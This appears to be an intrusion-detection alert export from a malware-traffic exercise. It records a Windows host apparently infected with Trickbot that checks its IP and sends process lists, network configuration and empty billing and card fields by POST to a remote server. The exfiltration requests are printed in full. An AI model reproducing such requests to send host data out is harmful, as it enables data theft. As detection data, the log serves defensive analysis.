1 |
Timestamp | 2021-01-04T09:01:44.921543-0800 |
Flow Id | 336765331723626 |
Source IP | 172.16.1.101 |
Source Port | 65499 |
Destination IP | 207.231.106.130 |
Destination Port | 80 |
Protocol | TCP |
Alert Signature | ET POLICY IP Check wtfismyip.com |
Alert Category | Potential Corporate Privacy Violation |
Alert Severity | 1 |
Alert Gid | 1 |
Alert Signature Id | 2019737 |
Payload Printable | GET /text HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: wtfismyip.com
|
---|
| 2021-01-04T09:01:44.921543-0800 | 172.16.1.101 | 207.231.106.130 | ET POLICY IP Check wtfismyip.com | * |
2 |
Timestamp | 2021-01-04T09:01:44.921543-0800 |
Flow Id | 336765331723626 |
Source IP | 172.16.1.101 |
Source Port | 65499 |
Destination IP | 207.231.106.130 |
Destination Port | 80 |
Protocol | TCP |
Alert Signature | ET POLICY curl User-Agent Outbound |
Alert Category | Attempted Information Leak |
Alert Severity | 2 |
Alert Gid | 1 |
Alert Signature Id | 2013028 |
Payload Printable | GET /text HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.72.0
Host: wtfismyip.com
|
---|
| 2021-01-04T09:01:44.921543-0800 | 172.16.1.101 | 207.231.106.130 | ET POLICY curl User-Agent Outbound | * |
3 |
Timestamp | 2021-01-04T09:07:21.784671-0800 |
Flow Id | 991277567511749 |
Source IP | 172.16.1.101 |
Source Port | 65522 |
Destination IP | 103.14.232.46 |
Destination Port | 443 |
Protocol | TCP |
Alert Signature | ET POLICY HTTP traffic on port 443 (POST) |
Alert Category | Potentially Bad Traffic |
Alert Severity | 2 |
Alert Gid | 1 |
Alert Signature Id | 2013926 |
Payload Printable | POST /mor9/DESKTOP-B5JPXN1_W10019042.6EF8D93A3B8FF281490CA5826FA3F67A/90 HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=---WebKitFormBoundary7MA4YWxkTrZu0gW
User-Agent: Winhttp 1/0
Content-Length: 5876
Host: 103.14.232.46:443
|
---|
| 2021-01-04T09:07:21.784671-0800 | 172.16.1.101 | 103.14.232.46 | ET POLICY HTTP traffic on port 443 (POST) | * |
4 |
Timestamp | 2021-01-04T09:07:21.784974-0800 |
Flow Id | 991277567511749 |
Source IP | 172.16.1.101 |
Source Port | 65522 |
Destination IP | 103.14.232.46 |
Destination Port | 443 |
Protocol | TCP |
Alert Signature | GPL ATTACK_RESPONSE command completed |
Alert Category | Potentially Bad Traffic |
Alert Severity | 2 |
Alert Gid | 1 |
Alert Signature Id | 2100494 |
Payload Printable | POST /mor9/DESKTOP-B5JPXN1_W10019042.6EF8D93A3B8FF281490CA5826FA3F67A/90 HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=---WebKitFormBoundary7MA4YWxkTrZu0gW
User-Agent: Winhttp 1/0
Content-Length: 5876
Host: 103.14.232.46:443
-----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="proclist"
..----------------PROCESS LIST----------------
[System Process]
System
Registry
smss.exe
csrss.exe
wininit.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe
svchost.exe
fontdrvhost.exe
fontdrvhost.exe
svchost.exe
svchost.exe
dwm.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
Memory Compression
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
spoolsv.exe
svchost.exe
armsvc.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
MsMpEng.exe
svchost.exe
svchost.exe
svchost.exe
SecurityHealthService.exe
dllhost.exe
sihost.exe
svchost.exe
svchost.exe
taskhostw.exe
svchost.exe
svchost.exe
ctfmon.exe
svchost.exe
explorer.exe
svchost.exe
StartMenuExperienceHost.exe
RuntimeBroker.exe
SearchApp.exe
RuntimeBroker.exe
svchost.exe
RuntimeBroker.exe
svchost.exe
TextInputHost.exe
dllhost.exe
SecurityHealthSystray.exe
ApplicationFrameHost.exe
svchost.exe
svchost.exe
RuntimeBroker.exe
svchost.exe
svchost.exe
svchost.exe
SgrmBroker.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
Microsoft.Photos.exe
svchost.exe
svchost.exe
OfficeClickToRun.exe
AppVShNotify.exe
AppVShNotify.exe
SearchIndexer.exe
RuntimeBroker.exe
svchost.exe
YourPhone.exe
svchost.exe
svchost.exe
svchost.exe
WUDFHost.exe
WinStore.App.exe
svchost.exe
svchost.exe
rundll32.exe
wermgr.exe
ShellExperienceHost.exe
RuntimeBroker.exe
svchost.exe
smartscreen.exe
svchost.exe
svchost.exe
audiodg.exe
SearchProtocolHost.exe
SearchFilterHost.exe
cmd.exe
conhost.exe
cmd.exe
conhost.exe
proclisttest
-----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="sysinfo"
..----------------SYSTEM_INFO----------------
.ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : DESKTOP-B5JPXN1
Primary Dns Suffix . . . . . . . : dorkyankees.com
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : dorkyankees.com
localdomain
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : localdomain
Description . . . . . . . . . . . : Intel(R) 82573E Gigabit Network Connection
Physical Address. . . . . . . . . : 00-08-02-1C-47-AE
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IPv4 Address. . . . . . . . . . . : 172.16.1.101(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Lease Obtained. . . . . . . . . . : Sunday, January 3, 2021 8:23:19 AM
Lease Expires . . . . . . . . . . : Sunday, January 10, 2021 8:23:19 AM
Default Gateway . . . . . . . . . : 172.16.1.1
DHCP Server . . . . . . . . . . . : 172.16.1.254
DNS Servers . . . . . . . . . . . : 172.16.1.16
Primary WINS Server . . . . . . . : 172.16.1.1
NetBIOS over Tcpip. . . . . . . . : Enabled
.net config workstation
Computer name \\DESKTOP-B5JPXN1
Full Computer name DESKTOP-B5JPXN1.dorkyankees.com
User name reggie.forsythe
Workstation active on
.NetBT_Tcpip_{909CE64D-AAC8-7A9F-DC15-E83F11DB6685} (0008021C47AE)
Software version Windows 10 Pro
Workstation domain DORKYANKEES
Workstation Dom |
---|
| 2021-01-04T09:07:21.784974-0800 | 172.16.1.101 | 103.14.232.46 | GPL ATTACK_RESPONSE command completed | * |
5 |
Timestamp | 2021-01-04T09:07:22.285590-0800 |
Flow Id | 991277567511749 |
Source IP | 172.16.1.101 |
Source Port | 65522 |
Destination IP | 103.14.232.46 |
Destination Port | 443 |
Protocol | TCP |
Alert Signature | ET TROJAN Suspicious POST with Common Windows Process Names - Possible Process List Exfiltration |
Alert Category | A Network Trojan was Detected |
Alert Severity | 1 |
Alert Gid | 1 |
Alert Signature Id | 2027117 |
Payload Printable | POST /mor9/DESKTOP-B5JPXN1_W10019042.6EF8D93A3B8FF281490CA5826FA3F67A/90 HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=---WebKitFormBoundary7MA4YWxkTrZu0gW
User-Agent: Winhttp 1/0
Content-Length: 5876
Host: 103.14.232.46:443
-----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="proclist"
..----------------PROCESS LIST----------------
[System Process]
System
Registry
smss.exe
csrss.exe
wininit.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe
svchost.exe
fontdrvhost.exe
fontdrvhost.exe
svchost.exe
svchost.exe
dwm.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
Memory Compression
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
spoolsv.exe
svchost.exe
armsvc.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
MsMpEng.exe
svchost.exe
svchost.exe
svchost.exe
SecurityHealthService.exe
dllhost.exe
sihost.exe
svchost.exe
svchost.exe
taskhostw.exe
svchost.exe
svchost.exe
ctfmon.exe
svchost.exe
explorer.exe
svchost.exe
StartMenuExperienceHost.exe
RuntimeBroker.exe
SearchApp.exe
RuntimeBroker.exe
svchost.exe
RuntimeBroker.exe
svchost.exe
TextInputHost.exe
dllhost.exe
SecurityHealthSystray.exe
ApplicationFrameHost.exe
svchost.exe
svchost.exe
RuntimeBroker.exe
svchost.exe
svchost.exe
svchost.exe
SgrmBroker.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
Microsoft.Photos.exe
svchost.exe
svchost.exe
OfficeClickToRun.exe
AppVShNotify.exe
AppVShNotify.exe
SearchIndexer.exe
RuntimeBroker.exe
svchost.exe
YourPhone.exe
svchost.exe
svchost.exe
svchost.exe
WUDFHost.exe
WinStore.App.exe
svchost.exe
svchost.exe
rundll32.exe
wermgr.exe
ShellExperienceHost.exe
RuntimeBroker.exe
svchost.exe
smartscreen.exe
svchost.exe
svchost.exe
audiodg.exe
SearchProtocolHost.exe
SearchFilterHost.exe
cmd.exe
conhost.exe
cmd.exe
conhost.exe
proclisttest
-----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="sysinfo"
..----------------SYSTEM_INFO----------------
.ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : DESKTOP-B5JPXN1
Primary Dns Suffix . . . . . . . : dorkyankees.com
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : dorkyankees.com
localdomain
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : localdomain
Description . . . . . . . . . . . : Intel(R) 82573E Gigabit Network Connection
Physical Address. . . . . . . . . : 00-08-02-1C-47-AE
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IPv4 Address. . . . . . . . . . . : 172.16.1.101(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Lease Obtained. . . . . . . . . . : Sunday, January 3, 2021 8:23:19 AM
Lease Expires . . . . . . . . . . : Sunday, January 10, 2021 8:23:19 AM
Default Gateway . . . . . . . . . : 172.16.1.1
DHCP Server . . . . . . . . . . . : 172.16.1.254
DNS Servers . . . . . . . . . . . : 172.16.1.16
Primary WINS Server . . . . . . . : 172.16.1.1
NetBIOS over Tcpip. . . . . . . . : Enabled
.net config workstation
Computer name \\DESKTOP-B5JPXN1
Full Computer name DESKTOP-B5JPXN1.dorkyankees.com
User name reggie.forsythe
Workstation active on
.NetBT_Tcpip_{909CE64D-AAC8-7A9F-DC15-E83F11DB6685} (0008021C47AE)
Software version Windows 10 Pro
Workstation domain DORKYANKEES
Workstation Dom |
---|
| 2021-01-04T09:07:22.285590-0800 | 172.16.1.101 | 103.14.232.46 | ET TROJAN Suspicious POST with Common Windows Process Names - Possible Process List Exfiltration | * |
6 |
Timestamp | 2021-01-04T09:07:22.285590-0800 |
Flow Id | 991277567511749 |
Source IP | 172.16.1.101 |
Source Port | 65522 |
Destination IP | 103.14.232.46 |
Destination Port | 443 |
Protocol | TCP |
Alert Signature | ET TROJAN Win32/Trickbot Data Exfiltration |
Alert Category | A Network Trojan was Detected |
Alert Severity | 1 |
Alert Gid | 1 |
Alert Signature Id | 2031241 |
Payload Printable | POST /mor9/DESKTOP-B5JPXN1_W10019042.6EF8D93A3B8FF281490CA5826FA3F67A/90 HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=---WebKitFormBoundary7MA4YWxkTrZu0gW
User-Agent: Winhttp 1/0
Content-Length: 5876
Host: 103.14.232.46:443
-----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="proclist"
..----------------PROCESS LIST----------------
[System Process]
System
Registry
smss.exe
csrss.exe
wininit.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe
svchost.exe
fontdrvhost.exe
fontdrvhost.exe
svchost.exe
svchost.exe
dwm.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
Memory Compression
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
spoolsv.exe
svchost.exe
armsvc.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
MsMpEng.exe
svchost.exe
svchost.exe
svchost.exe
SecurityHealthService.exe
dllhost.exe
sihost.exe
svchost.exe
svchost.exe
taskhostw.exe
svchost.exe
svchost.exe
ctfmon.exe
svchost.exe
explorer.exe
svchost.exe
StartMenuExperienceHost.exe
RuntimeBroker.exe
SearchApp.exe
RuntimeBroker.exe
svchost.exe
RuntimeBroker.exe
svchost.exe
TextInputHost.exe
dllhost.exe
SecurityHealthSystray.exe
ApplicationFrameHost.exe
svchost.exe
svchost.exe
RuntimeBroker.exe
svchost.exe
svchost.exe
svchost.exe
SgrmBroker.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
Microsoft.Photos.exe
svchost.exe
svchost.exe
OfficeClickToRun.exe
AppVShNotify.exe
AppVShNotify.exe
SearchIndexer.exe
RuntimeBroker.exe
svchost.exe
YourPhone.exe
svchost.exe
svchost.exe
svchost.exe
WUDFHost.exe
WinStore.App.exe
svchost.exe
svchost.exe
rundll32.exe
wermgr.exe
ShellExperienceHost.exe
RuntimeBroker.exe
svchost.exe
smartscreen.exe
svchost.exe
svchost.exe
audiodg.exe
SearchProtocolHost.exe
SearchFilterHost.exe
cmd.exe
conhost.exe
cmd.exe
conhost.exe
proclisttest
-----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="sysinfo"
..----------------SYSTEM_INFO----------------
.ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : DESKTOP-B5JPXN1
Primary Dns Suffix . . . . . . . : dorkyankees.com
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : dorkyankees.com
localdomain
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : localdomain
Description . . . . . . . . . . . : Intel(R) 82573E Gigabit Network Connection
Physical Address. . . . . . . . . : 00-08-02-1C-47-AE
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IPv4 Address. . . . . . . . . . . : 172.16.1.101(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Lease Obtained. . . . . . . . . . : Sunday, January 3, 2021 8:23:19 AM
Lease Expires . . . . . . . . . . : Sunday, January 10, 2021 8:23:19 AM
Default Gateway . . . . . . . . . : 172.16.1.1
DHCP Server . . . . . . . . . . . : 172.16.1.254
DNS Servers . . . . . . . . . . . : 172.16.1.16
Primary WINS Server . . . . . . . : 172.16.1.1
NetBIOS over Tcpip. . . . . . . . : Enabled
.net config workstation
Computer name \\DESKTOP-B5JPXN1
Full Computer name DESKTOP-B5JPXN1.dorkyankees.com
User name reggie.forsythe
Workstation active on
.NetBT_Tcpip_{909CE64D-AAC8-7A9F-DC15-E83F11DB6685} (0008021C47AE)
Software version Windows 10 Pro
Workstation domain DORKYANKEES
Workstation Dom |
---|
| 2021-01-04T09:07:22.285590-0800 | 172.16.1.101 | 103.14.232.46 | ET TROJAN Win32/Trickbot Data Exfiltration | * |
7 |
Timestamp | 2021-01-04T09:07:22.285590-0800 |
Flow Id | 991277567511749 |
Source IP | 172.16.1.101 |
Source Port | 65522 |
Destination IP | 103.14.232.46 |
Destination Port | 443 |
Protocol | TCP |
Alert Signature | GPL ATTACK_RESPONSE command completed |
Alert Category | Potentially Bad Traffic |
Alert Severity | 2 |
Alert Gid | 1 |
Alert Signature Id | 2100494 |
Payload Printable | POST /mor9/DESKTOP-B5JPXN1_W10019042.6EF8D93A3B8FF281490CA5826FA3F67A/90 HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=---WebKitFormBoundary7MA4YWxkTrZu0gW
User-Agent: Winhttp 1/0
Content-Length: 5876
Host: 103.14.232.46:443
-----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="proclist"
..----------------PROCESS LIST----------------
[System Process]
System
Registry
smss.exe
csrss.exe
wininit.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe
svchost.exe
fontdrvhost.exe
fontdrvhost.exe
svchost.exe
svchost.exe
dwm.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
Memory Compression
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
spoolsv.exe
svchost.exe
armsvc.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
MsMpEng.exe
svchost.exe
svchost.exe
svchost.exe
SecurityHealthService.exe
dllhost.exe
sihost.exe
svchost.exe
svchost.exe
taskhostw.exe
svchost.exe
svchost.exe
ctfmon.exe
svchost.exe
explorer.exe
svchost.exe
StartMenuExperienceHost.exe
RuntimeBroker.exe
SearchApp.exe
RuntimeBroker.exe
svchost.exe
RuntimeBroker.exe
svchost.exe
TextInputHost.exe
dllhost.exe
SecurityHealthSystray.exe
ApplicationFrameHost.exe
svchost.exe
svchost.exe
RuntimeBroker.exe
svchost.exe
svchost.exe
svchost.exe
SgrmBroker.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
Microsoft.Photos.exe
svchost.exe
svchost.exe
OfficeClickToRun.exe
AppVShNotify.exe
AppVShNotify.exe
SearchIndexer.exe
RuntimeBroker.exe
svchost.exe
YourPhone.exe
svchost.exe
svchost.exe
svchost.exe
WUDFHost.exe
WinStore.App.exe
svchost.exe
svchost.exe
rundll32.exe
wermgr.exe
ShellExperienceHost.exe
RuntimeBroker.exe
svchost.exe
smartscreen.exe
svchost.exe
svchost.exe
audiodg.exe
SearchProtocolHost.exe
SearchFilterHost.exe
cmd.exe
conhost.exe
cmd.exe
conhost.exe
proclisttest
-----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="sysinfo"
..----------------SYSTEM_INFO----------------
.ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : DESKTOP-B5JPXN1
Primary Dns Suffix . . . . . . . : dorkyankees.com
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : dorkyankees.com
localdomain
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : localdomain
Description . . . . . . . . . . . : Intel(R) 82573E Gigabit Network Connection
Physical Address. . . . . . . . . : 00-08-02-1C-47-AE
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IPv4 Address. . . . . . . . . . . : 172.16.1.101(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Lease Obtained. . . . . . . . . . : Sunday, January 3, 2021 8:23:19 AM
Lease Expires . . . . . . . . . . : Sunday, January 10, 2021 8:23:19 AM
Default Gateway . . . . . . . . . : 172.16.1.1
DHCP Server . . . . . . . . . . . : 172.16.1.254
DNS Servers . . . . . . . . . . . : 172.16.1.16
Primary WINS Server . . . . . . . : 172.16.1.1
NetBIOS over Tcpip. . . . . . . . : Enabled
.net config workstation
Computer name \\DESKTOP-B5JPXN1
Full Computer name DESKTOP-B5JPXN1.dorkyankees.com
User name reggie.forsythe
Workstation active on
.NetBT_Tcpip_{909CE64D-AAC8-7A9F-DC15-E83F11DB6685} (0008021C47AE)
Software version Windows 10 Pro
Workstation domain DORKYANKEES
Workstation Dom |
---|
| 2021-01-04T09:07:22.285590-0800 | 172.16.1.101 | 103.14.232.46 | GPL ATTACK_RESPONSE command completed | * |
8 |
Timestamp | 2021-01-04T09:08:01.346856-0800 |
Flow Id | 876855346379458 |
Source IP | 172.16.1.101 |
Source Port | 65527 |
Destination IP | 103.14.232.46 |
Destination Port | 443 |
Protocol | TCP |
Alert Signature | ET POLICY HTTP traffic on port 443 (POST) |
Alert Category | Potentially Bad Traffic |
Alert Severity | 2 |
Alert Gid | 1 |
Alert Signature Id | 2013926 |
Payload Printable | POST /mor9/DESKTOP-B5JPXN1_W10019042.6EF8D93A3B8FF281490CA5826FA3F67A/83/ HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary=---------LTRPLDGKFSNWOXNR
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E)
Host: 103.14.232.46:443
Content-Length: 282
Connection: Close
Cache-Control: no-cache
|
---|
| 2021-01-04T09:08:01.346856-0800 | 172.16.1.101 | 103.14.232.46 | ET POLICY HTTP traffic on port 443 (POST) | * |
9 |
Timestamp | 2021-01-04T09:01:40.925947-0800 |
Flow Id | 2145251505724010 |
Source IP | 102.164.208.44 |
Source Port | 449 |
Destination IP | 172.16.1.101 |
Destination Port | 65498 |
Protocol | TCP |
Alert Signature | ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) |
Alert Category | Not Suspicious Traffic |
Alert Severity | 3 |
Alert Gid | 1 |
Alert Signature Id | 2011540 |
Payload Printable | ....A...=..l..p.s..VXb2.......h....zL...R......................#..........n...j..g..d0..`0..H.........[...@
.0
..*.H..
.....0E1.0...U....AU1.0...U...
Some-State1!0...U.
..Internet Widgits Pty Ltd0..
201104152858Z.
211104152858Z0E1.0...U....AU1.0...U...
Some-State1!0...U.
..Internet Widgits Pty Ltd0.."0
..*.H..
..........0..
......v."..%..4.....M.e..F..... 1...F6...k...^.....(.........D)Y....j.`.U.Tt.y...O...t,bk.....X...N.......jY.:'..y..^..".......j.3\....D......o.....}.34.E.\...SK|u.g......0..8.....kv...{......;./..C1hR....0O...iU..\
....D.|........"f&.".T;...x......9..&,..m..........S0Q0...U.........Su....q....C.u...0...U.#..0......Su....q....C.u...0...U.......0....0
..*.H..
..........`WKSavT7
.....D:..S...Kg.{..2.Q}
.x.Y..5(0.v...Vm.>D..Tc
H
G..~...]..%....r..F..,Q..XQ...kW.m..a7BC..`...5n.....}7c@.0...l..'.'.v<V..M
...'....B...y.ObM....].$\R@Y@.Y...a6...^V.'..R..y^P?!.(.J>..e^.:....r..Q.....a
....8.`..?_5.....RuW .J.....V."...............*...&... s.,.*...!?....^z...l.3==..K....5...;...1.n\...D...A..5.H.K...sNO..qs.4.di...T.'N...;C...n.".Q.y..R?....A...M.....j.....{..|lLfP. .<.J.........q....j...P.....GNX.e.z.jX1......d-N....Ch0$.!H..}&(.:t.C.RsGW....r.2._..}.....d.Y...,.....V..J<Xe..e2s..z....v...W.T..v.....d........U.s%.."....tfk.......... |
---|
| 2021-01-04T09:01:40.925947-0800 | 102.164.208.44 | 172.16.1.101 | ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) | * |
10 |
Timestamp | 2021-01-04T09:08:01.799739-0800 |
Flow Id | 876855346379458 |
Source IP | 172.16.1.101 |
Source Port | 65527 |
Destination IP | 103.14.232.46 |
Destination Port | 443 |
Protocol | TCP |
Alert Signature | ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 |
Alert Category | Potentially Bad Traffic |
Alert Severity | 2 |
Alert Gid | 1 |
Alert Signature Id | 2018358 |
Payload Printable | POST /mor9/DESKTOP-B5JPXN1_W10019042.6EF8D93A3B8FF281490CA5826FA3F67A/83/ HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary=---------LTRPLDGKFSNWOXNR
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E)
Host: 103.14.232.46:443
Content-Length: 282
Connection: Close
Cache-Control: no-cache
-----------LTRPLDGKFSNWOXNR
Content-Disposition: form-data; name="formdata"
{]}-----------LTRPLDGKFSNWOXNR
Content-Disposition: form-data; name="billinfo"
{]}-----------LTRPLDGKFSNWOXNR
Content-Disposition: form-data; name="cardinfo"
{]}
-----------LTRPLDGKFSNWOXNR--
|
---|
| 2021-01-04T09:08:01.799739-0800 | 172.16.1.101 | 103.14.232.46 | ET INFO GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1 | * |
11 |
Timestamp | 2021-01-04T09:09:46.713500-0800 |
Flow Id | 1006814621206280 |
Source IP | 172.16.1.101 |
Source Port | 49153 |
Destination IP | 103.14.232.46 |
Destination Port | 443 |
Protocol | TCP |
Alert Signature | ET POLICY HTTP traffic on port 443 (POST) |
Alert Category | Potentially Bad Traffic |
Alert Severity | 2 |
Alert Gid | 1 |
Alert Signature Id | 2013926 |
Payload Printable | POST /mor9/DESKTOP-B5JPXN1_W10019042.6EF8D93A3B8FF281490CA5826FA3F67A/90 HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=---WebKitFormBoundary7MA4YWxkTrZu0gW
User-Agent: Winhttp 1/0
Content-Length: 5876
Host: 103.14.232.46:443
|
---|
| 2021-01-04T09:09:46.713500-0800 | 172.16.1.101 | 103.14.232.46 | ET POLICY HTTP traffic on port 443 (POST) | * |
12 |
Timestamp | 2021-01-04T09:09:47.235865-0800 |
Flow Id | 1006814621206280 |
Source IP | 172.16.1.101 |
Source Port | 49153 |
Destination IP | 103.14.232.46 |
Destination Port | 443 |
Protocol | TCP |
Alert Signature | ET TROJAN Suspicious POST with Common Windows Process Names - Possible Process List Exfiltration |
Alert Category | A Network Trojan was Detected |
Alert Severity | 1 |
Alert Gid | 1 |
Alert Signature Id | 2027117 |
Payload Printable | POST /mor9/DESKTOP-B5JPXN1_W10019042.6EF8D93A3B8FF281490CA5826FA3F67A/90 HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=---WebKitFormBoundary7MA4YWxkTrZu0gW
User-Agent: Winhttp 1/0
Content-Length: 5876
Host: 103.14.232.46:443
-----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="proclist"
..----------------PROCESS LIST----------------
[System Process]
System
Registry
smss.exe
csrss.exe
wininit.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe
svchost.exe
fontdrvhost.exe
fontdrvhost.exe
svchost.exe
svchost.exe
dwm.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
Memory Compression
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
spoolsv.exe
svchost.exe
armsvc.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
MsMpEng.exe
svchost.exe
svchost.exe
svchost.exe
SecurityHealthService.exe
dllhost.exe
sihost.exe
svchost.exe
svchost.exe
taskhostw.exe
svchost.exe
svchost.exe
ctfmon.exe
svchost.exe
explorer.exe
svchost.exe
StartMenuExperienceHost.exe
RuntimeBroker.exe
SearchApp.exe
RuntimeBroker.exe
svchost.exe
RuntimeBroker.exe
svchost.exe
TextInputHost.exe
dllhost.exe
SecurityHealthSystray.exe
ApplicationFrameHost.exe
svchost.exe
svchost.exe
RuntimeBroker.exe
svchost.exe
svchost.exe
svchost.exe
SgrmBroker.exe
svchost.exe
svchost.exe
svchost.exe
svchost.exe
Microsoft.Photos.exe
svchost.exe
svchost.exe
OfficeClickToRun.exe
AppVShNotify.exe
AppVShNotify.exe
SearchIndexer.exe
RuntimeBroker.exe
svchost.exe
YourPhone.exe
svchost.exe
svchost.exe
svchost.exe
WUDFHost.exe
WinStore.App.exe
svchost.exe
svchost.exe
rundll32.exe
wermgr.exe
ShellExperienceHost.exe
RuntimeBroker.exe
svchost.exe
smartscreen.exe
svchost.exe
svchost.exe
audiodg.exe
SearchProtocolHost.exe
SearchFilterHost.exe
cmd.exe
conhost.exe
cmd.exe
conhost.exe
proclisttest
-----WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="sysinfo"
..----------------SYSTEM_INFO----------------
.ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : DESKTOP-B5JPXN1
Primary Dns Suffix . . . . . . . : dorkyankees.com
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : dorkyankees.com
localdomain
